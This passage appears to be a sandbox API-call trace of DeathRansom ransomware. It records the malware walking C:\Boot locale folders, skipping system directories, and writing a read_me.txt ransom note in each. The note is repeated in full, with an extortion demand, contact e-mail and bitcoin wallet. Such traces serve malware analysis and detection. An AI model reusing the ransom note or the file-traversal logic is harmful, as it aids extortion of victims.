lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.028] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.029] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\read_me.txt") returned 29 [0075.029] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\read_me.txt" (normalized: "c:\\boot\\nb-no\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.029] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.029] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.030] CloseHandle (hObject=0x7a8) returned 1 [0075.030] GetProcessHeap () returned 0x4f10000 [0075.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ad0070 | out: hHeap=0x4f10000) returned 1 [0075.030] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0075.030] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0075.030] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0075.030] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0075.030] StrStrW (lpFirst="nl-nl", lpSrch="programdata") returned 0x0 [0075.030] StrStrW (lpFirst="nl-nl", lpSrch="$recycle.bin") returned 0x0 [0075.030] StrStrW (lpFirst="nl-nl", lpSrch="program files") returned 0x0 [0075.030] StrStrW (lpFirst="nl-nl", lpSrch="windows") returned 0x0 [0075.030] StrStrW (lpFirst="nl-nl", lpSrch="all users") returned 0x0 [0075.030] StrStrW (lpFirst="nl-nl", lpSrch="appdata") returned 0x0 [0075.030] GetProcessHeap () returned 0x4f10000 [0075.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.030] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\nl-NL" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL") returned="\\\\?\\C:\\Boot\\nl-NL" [0075.030] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 16 [0075.030] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.031] GetProcessHeap () returned 0x4f10000 [0075.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.031] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\*") returned 19 [0075.032] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.032] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\.") returned 19 [0075.032] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.032] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.032] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.032] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\..") returned 20 [0075.032] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.032] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.032] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0075.032] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.032] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.032] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\read_me.txt") returned 29 [0075.032] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\read_me.txt" (normalized: "c:\\boot\\nl-nl\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.032] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.032] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.033] CloseHandle (hObject=0x7a8) returned 1 [0075.033] GetProcessHeap () returned 0x4f10000 [0075.033] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.033] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0075.033] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0075.033] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0075.033] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0075.034] StrStrW (lpFirst="pl-pl", lpSrch="programdata") returned 0x0 [0075.034] StrStrW (lpFirst="pl-pl", lpSrch="$recycle.bin") returned 0x0 [0075.034] StrStrW (lpFirst="pl-pl", lpSrch="program files") returned 0x0 [0075.034] StrStrW (lpFirst="pl-pl", lpSrch="windows") returned 0x0 [0075.034] StrStrW (lpFirst="pl-pl", lpSrch="all users") returned 0x0 [0075.034] StrStrW (lpFirst="pl-pl", lpSrch="appdata") returned 0x0 [0075.034] GetProcessHeap () returned 0x4f10000 [0075.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.034] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\pl-PL" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL") returned="\\\\?\\C:\\Boot\\pl-PL" [0075.034] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 17 [0075.034] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.035] GetProcessHeap () returned 0x4f10000 [0075.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.036] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\*") returned 19 [0075.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.036] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\.") returned 19 [0075.036] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.036] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.036] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.036] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\..") returned 20 [0075.036] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.036] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.036] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0075.036] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.036] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.036] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\read_me.txt") returned 29 [0075.036] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\read_me.txt" (normalized: "c:\\boot\\pl-pl\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.036] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.036] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.037] CloseHandle (hObject=0x7a8) returned 1 [0075.037] GetProcessHeap () returned 0x4f10000 [0075.037] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.037] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0075.037] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0075.037] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0075.037] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0075.037] StrStrW (lpFirst="pt-br", lpSrch="programdata") returned 0x0 [0075.038] StrStrW (lpFirst="pt-br", lpSrch="$recycle.bin") returned 0x0 [0075.038] StrStrW (lpFirst="pt-br", lpSrch="program files") returned 0x0 [0075.038] StrStrW (lpFirst="pt-br", lpSrch="windows") returned 0x0 [0075.038] StrStrW (lpFirst="pt-br", lpSrch="all users") returned 0x0 [0075.038] StrStrW (lpFirst="pt-br", lpSrch="appdata") returned 0x0 [0075.038] GetProcessHeap () returned 0x4f10000 [0075.038] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.038] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Boot\\pt-BR" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR") returned="\\\\?\\C:\\Boot\\pt-BR" [0075.038] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 18 [0075.038] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.039] GetProcessHeap () returned 0x4f10000 [0075.039] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.039] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\*") returned 19 [0075.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.039] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\.") returned 19 [0075.039] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.039] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.039] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.039] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\..") returned 20 [0075.039] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.039] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.039] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0075.039] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.039] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.039] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\read_me.txt") returned 29 [0075.040] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\read_me.txt" (normalized: "c:\\boot\\pt-br\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0075.040] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: 